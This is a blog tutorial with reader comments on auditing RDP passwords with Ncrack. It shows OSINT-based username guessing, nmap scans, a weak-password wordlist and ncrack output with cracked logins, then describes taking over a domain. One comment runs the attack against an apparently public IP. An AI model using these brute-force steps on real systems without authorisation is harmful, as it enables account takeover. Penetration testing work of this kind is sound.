Remote desktop credentials audit with Ncrack
DISCLAIMER
All information provided are for educational purposes only. It is not an endorsement to undertake hacking activity in any form (unless such activity is authorized). Tools and techniques demonstrated may be potential damaging if used inappropriately. All characters and data written on this post are fictitious.
The Remote Desktop Protocol is often underestimated as a possible way to break into a system during a penetration test. Other services, such SSH and VNC are more likely to be targeted and exploited using a remote brute-force password guessing attack. For example, let’s suppose that we are in the middle of a penetration testing session at the “MEGACORP” offices and we already tried all the available remote attacks with no luck. We tried also to ARP poisoning the LAN looking to get user names and passwords, without succeeding. From a previus nmap scan log we found a few Windows machines with the RDP port open and we decided to investigate further this possibility. First of all we need some valid usernames in order to guess only the passwords rather than both. We found the names of the IT guys on varius social networking websites. Those are the key IT staff:
jessie tagle
julio feagins
hugh duchene
darmella martis
lakisha mcquain
ted restrepo
kelly missildine
Didn’t take long to create valid usernames following the common standard of using the first letter of the name and the entire surname.
jtagle
jfeagins
hduchene
dmartis
lmcquain
trestrepo
kmissildine
Software required:
Linux machine, preferably Ubuntu.
nmap and terminal server client, sudo apt-get install tsclient nmap build-essential checkinstall libssl-dev libssh-dev
About Ncrack
Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. Security professionals also rely on Ncrack when auditing their clients. Ncrack’s features include a very flexible interface granting the user full control of network operations, allowing for very sophisticated bruteforcing attacks, timing templates for ease of use, runtime interaction similar to Nmap’s and many more. Protocols supported include RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, and telnet .http://nmap.org/ncrack/
Installation
wget http://nmap.org/ncrack/dist/ncrack-0.4ALPHA.tar.gz
mkdir /usr/local/share/ncrack
tar -xzf ncrack-0.4ALPHA.tar.gz
cd ncrack-0.4ALPHA
./configure
make
checkinstall
dpkg -i ncrack_0.4ALPHA-1_i386.deb
Information gathering
Let’s find out what hosts in a network are up, and save them to a text list. The regular expression will parse and extract only the ip addresses from the scan.
Nmap ping scan, go no further than determining if host is online
nmap -sP 192.168.56.0/24 | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' > 192.168.56.0.txt
Nmap fast scan with input from list of hosts/networks
nmap -F -iL 192.168.56.0.txt
Starting Nmap 5.21 ( http://nmap.org ) at 2011-04-10 13:15 CEST Nmap scan report for 192.168.56.10 Host is up (0.0017s latency). Not shown: 91 closed ports PORT STATE SERVICE 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 1026/tcp open LSA-or-nterm 1028/tcp open unknown 3389/tcp open ms-term-serv MAC Address: 08:00:27:09:F5:22 (Cadmus Computer Systems) Nmap scan report for 192.168.56.101 Host is up (0.014s latency). Not shown: 96 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-term-serv MAC Address: 08:00:27:C1:5D:4E (Cadmus Computer Systems) Nmap done: 55 IP addresses (55 hosts up) scanned in 98.41 seconds
From the log we can see two machines with the microsoft terminal service port (3389) open, looking more in depth to the services available on the machine 192.168.56.10 we can assume that this machine might be the domain controller, and it’s worth trying
to pwn it.
At this point we need to create a file (my.usr) with the probable usernames previously gathered.
vim my.usr
jtagle
jfeagins
hduchene
trestrepo
kmissildine
We need also a file (my.pwd) for the password, you can look on the internet for common passwords and wordlists.
vim my.pwd
somepassword
passw0rd
blahblah
12345678
iloveyou
trustno1
At this point we run Ncrack against the 192.168.56.10 machine.
ncrack -vv -U my.usr -P my.pwd 192.168.56.10:3389,CL=1 Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-10 17:24 CEST Discovered credentials on rdp://192.168.56.10:3389 'hduchene' 'passw0rd' rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon. Discovered credentials on rdp://192.168.56.10:3389 'jfeagins' 'blahblah' rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon. Discovered credentials on rdp://192.168.56.10:3389 'jtagle' '12345678' rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon. Discovered credentials on rdp://192.168.56.10:3389 'kmissildine' 'iloveyou' rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon. Discovered credentials on rdp://192.168.56.10:3389 'trestrepo' 'trustno1' rdp://192.168.56.10:3389 finished. Discovered credentials for rdp on 192.168.56.10 3389/tcp: 192.168.56.10 3389/tcp rdp: 'hduchene' 'passw0rd' 192.168.56.10 3389/tcp rdp: 'jfeagins' 'blahblah' 192.168.56.10 3389/tcp rdp: 'jtagle' '12345678' 192.168.56.10 3389/tcp rdp: 'kmissildine' 'iloveyou' 192.168.56.10 3389/tcp rdp: 'trestrepo' 'trustno1' Ncrack done: 1 service scanned in 98.00 seconds. Probes sent: 51 | timed-out: 0 | prematurely-closed: 0 Ncrack finished.
We can see from the Ncrack results that all the user names gathered are valid, and also we were able to crack the login credential since they were using some weak passwords. Four of the IT staff have some kind of restrictions on the machine, except hduchene that might be the domain administrator, let’s find out.
Run the terminal server client from the Linux box
tsclient 192.168.56.10 use Hugh Duchene credential ‘hduchene’ ‘passw0rd’ and BINGO !!!
At this point we have the control of the entire MEGACORP domain, unlimited access to all the corporate resources related to the domain. We can add users, escalate privileges of existing users, browse over the protected network resources, install backdoors and root-kits, and more and more.
Final remarks.
For the penetration testers: don’t give up at first hurdle, there’s always another way to break in 
.
For the IT staff: Lack of password policy enforcing complexity and strength lead to a disaster.
Scridb filter
13/05/2011 at 7:56 am Permalink
I tried this with ncrack on BackTrack 5 which is 0.3Alpha which gave me an error: Invalid service module: rdp
I then tried to install ncrack 0.4Alpha in Ubuntu and get an error running make, it’s complaining about crypto stuff.
Any ideas?
Thanks
13/05/2011 at 8:29 am Permalink
Hi mate,
Can you paste the error, crypto stuff is too generic.
Best,
Phillip
13/05/2011 at 8:40 am Permalink
Thanks for the quick response Philip, here is the make output with the errors:
______________________________
Compiling libnbase
cd nbase && make
make[1]: Entering directory `/home/keith/Downloads/ncrack-0.4ALPHA/nbase’
make[1]: Nothing to be done for `all’.
make[1]: Leaving directory `/home/keith/Downloads/ncrack-0.4ALPHA/nbase’
Compiling libnsock
cd nsock/src && make
make[1]: Entering directory `/home/keith/Downloads/ncrack-0.4ALPHA/nsock/src’
cd ../../nbase && make
make[2]: Entering directory `/home/keith/Downloads/ncrack-0.4ALPHA/nbase’
make[2]: Nothing to be done for `all’.
make[2]: Leaving directory `/home/keith/Downloads/ncrack-0.4ALPHA/nbase’
make[1]: Leaving directory `/home/keith/Downloads/ncrack-0.4ALPHA/nsock/src’
Compiling modules
cd modules && make
make[1]: Entering directory `/home/keith/Downloads/ncrack-0.4ALPHA/modules’
make[1]: Nothing to be done for `all’.
make[1]: Leaving directory `/home/keith/Downloads/ncrack-0.4ALPHA/modules’
make ncrack
make[1]: Entering directory `/home/keith/Downloads/ncrack-0.4ALPHA’
g++ -c -Inbase -Insock/include -Imodules -DHAVE_CONFIG_H -DNCRACK_NAME=\”Ncrack\” -DNCRACK_URL=\”http://ncrack.org\” -DNCRACK_PLATFORM=\”i686-pc-linux-gnu\” -DNCRACKDATADIR=\”/usr/local/share/ncrack\” -D_FORTIFY_SOURCE=2 -O2 -Wall -Wextra -fno-strict-aliasing crypto.cc -o crypto.o
crypto.cc: In function ‘void deskey(unsigned char*, int)’:
crypto.cc:545:14: error: ‘DE1’ was not declared in this scope
crypto.cc: In function ‘void cookey(long unsigned int*)’:
crypto.cc:590:14: error: ‘usekey’ was not declared in this scope
make[1]: *** [crypto.o] Error 1
make[1]: Leaving directory `/home/keith/Downloads/ncrack-0.4ALPHA’
make: *** [all] Error 2
____________________________________________
13/05/2011 at 11:36 am Permalink
Hi Keith,
you can try installing the missing crypto libs with the following command apt-get install build-essential checkinstall libssl-dev libssh-dev
keep me updated.
Phillip
13/05/2011 at 12:32 pm Permalink
Hi Philip
That did the trick, many thanks for your help and great post too by the way
Cheers
Keith
13/05/2011 at 12:58 pm Permalink
I’m really glad that worked, the post is updated with the missing dependencies. Thanks again.
phillip
27/05/2011 at 11:02 pm Permalink
Hi , i have some issues when install Ncrack so you can help me?
——————————————————————————————-
g++ -c -Inbase -Insock/include -Imodules -DHAVE_CONFIG_H -DNCRACK_NAME=\”Ncrack\” -DNCRACK_URL=\”http://ncrack.org\” -DNCRACK_PLATFORM=\”i686-pc-linux-gnu\” -DNCRACKDATADIR=\”/usr/local/share/ncrack\” -D_FORTIFY_SOURCE=2 -O2 -Wall -Wextra -fno-strict-aliasing crypto.cc -o crypto.o
crypto.cc: In function ‘void deskey(unsigned char*, int)’:
crypto.cc:545: error: ‘DE1’ was not declared in this scope
crypto.cc: In function ‘void cookey(long unsigned int*)’:
crypto.cc:590: error: ‘usekey’ was not declared in this scope
make: *** [crypto.o] Error 1
**** Installation failed. Aborting package creation.
Restoring overwritten files from backup…OK
Cleaning up…OK
Bye.
28/07/2011 at 11:04 am Permalink
Hey
Just wanted to reiterate the thanks on the suggestions for installing the crypto libs. The aforementioned suggestion worked for me as well when confronted with the same error.
VS
05/09/2011 at 12:21 am Permalink
Very informative, thanks alot.
I`ve been searching on the net for a good ncrack tutorial
Only thing is how can I use lists for it like:
127.0.0.1
98.2.3.1
…
to brute on multiple ip addresses and also lists for user-names and passwords
That would be really neat.
Can anyone help please?
18/09/2011 at 8:09 pm Permalink
Hello am having problem with ncrack given these error message below….
“root@famous-compaq-nx9040-EE142PA-ABJ:~/ncrack-0.4ALPHA# ncrack -vv -U my.usr -P my.pwd 91.197.250.26:3389,CL=1
No command ‘ncrack’ found, did you mean:
Command ‘lcrack’ from package ‘lcrack’ (universe)
ncrack: command not found
root@famous-compaq-nx9040-EE142PA-ABJ:~/ncrack-0.4ALPHA#”
Did you compile Ncrack by yourself ?
Phillip
Help me out
06/03/2012 at 12:27 am Permalink
[root@bio-engine opensshlib]# apt-get install build-essential checkinstall libssl-dev libssh-dev
i get same error
[root@bio-engine opensshlib]# apt-get install build-essential checkinstall libssl-dev libssh-dev
-bash: apt-get: command not found
21/03/2012 at 2:49 am Permalink
It didnt work it. Maybe it work in 2011.
22/03/2012 at 10:03 pm Permalink
Excellent tutorial.